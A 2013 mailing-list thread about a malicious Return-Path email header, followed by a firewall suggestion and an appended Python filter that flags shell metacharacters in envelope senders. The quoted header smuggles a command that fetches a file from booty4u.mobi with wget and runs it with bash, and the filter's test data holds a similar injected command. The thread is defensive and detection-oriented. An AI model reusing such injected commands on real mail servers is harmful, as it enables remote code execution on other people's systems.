Return-Path code execution exploit?

Solbu

May 6, 2013, 11:10:23 AM

I just saw a user pasting what he thinks was an interesting Return-Path
header. It contains code and not a return address, that could be executed
if the recipient address does not exist.

The header line in question is this one: (sorry for the loong line)
===
Return-path: <no`wget${IFS}-O${IFS}/tmp/ul2sfwxaq7${IFS}booty4u.mobi/bla``bash${IFS}/tmp/ul2sfwxaq7`bo...@bitmynt.no>
===
He also says that there is no From:, body is "test", the rest is minimal.

Is there anything one can do to protect oneself from such attacks?
I tried Google, but I get no useful results.

- --
Solbu - http://www.solbu.net
PGP key ID: 0xFA687324

pio...@gmail.com

May 6, 2013, 8:09:19 PM
On Monday, May 6, 2013 5:10:23 PM UTC+2, Solbu wrote:
> Is there anything one can do to protect oneself from such attacks?

Add rules to your firewall to allow outgoing connections only on valid ports. This one is trying to use port 60002. I do not know about any legitimate service using this port so it can be safely blocked on outgoing connections.
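
A mail filter or log review can also flag envelope senders shaped like the one quoted in this thread before any delivery or bounce script handles them. The following is an added example, not part of the original posts; the function name, the character sets and the sample messages are constructed assumptions.

```python
import re
from email import message_from_string

# Conservative allow-list for an envelope sender (assumption: stricter than RFC 5321).
SAFE_ADDR = re.compile(r"^[A-Za-z0-9._%+=-]+@[A-Za-z0-9.-]+$")
# Characters a shell would interpret if the address were interpolated into a command.
SHELL_META = re.compile(r"[`$(){}|;&<>\\'\"\s]")


def check_return_path(raw_message):
    """Return a list of (address, metacharacters) for every suspicious Return-Path."""
    msg = message_from_string(raw_message)
    findings = []
    for value in msg.get_all("Return-Path", []):
        addr = value.strip()
        if addr.startswith("<") and addr.endswith(">"):
            addr = addr[1:-1]
        if addr == "":
            # The null sender <> is legitimate (used for bounces).
            continue
        meta = sorted(set(SHELL_META.findall(addr)))
        if meta or not SAFE_ADDR.match(addr):
            findings.append((addr, meta))
    return findings


# Constructed sample messages (not taken from real mail).
SAMPLE_OK = "Return-Path: <alice@example.org>\nSubject: hi\n\ntest\n"
SAMPLE_NULL = "Return-Path: <>\nSubject: bounce\n\ntest\n"
# Same shape as the header in the thread: backticks and ${IFS} inside the local part.
SAMPLE_BAD = "Return-path: <no`touch${IFS}/tmp/x`body@example.org>\n\ntest\n"

if __name__ == "__main__":
    for name, raw in [("ok", SAMPLE_OK), ("null", SAMPLE_NULL), ("bad", SAMPLE_BAD)]:
        hits = check_return_path(raw)
        if hits:
            for addr, meta in hits:
                print(f"{name}: REJECT {addr!r} metacharacters={meta}")
        else:
            print(f"{name}: accept")
```

Rejecting such a sender at SMTP time complements the egress filtering suggested above, since the message never reaches any component that might hand the address to a shell.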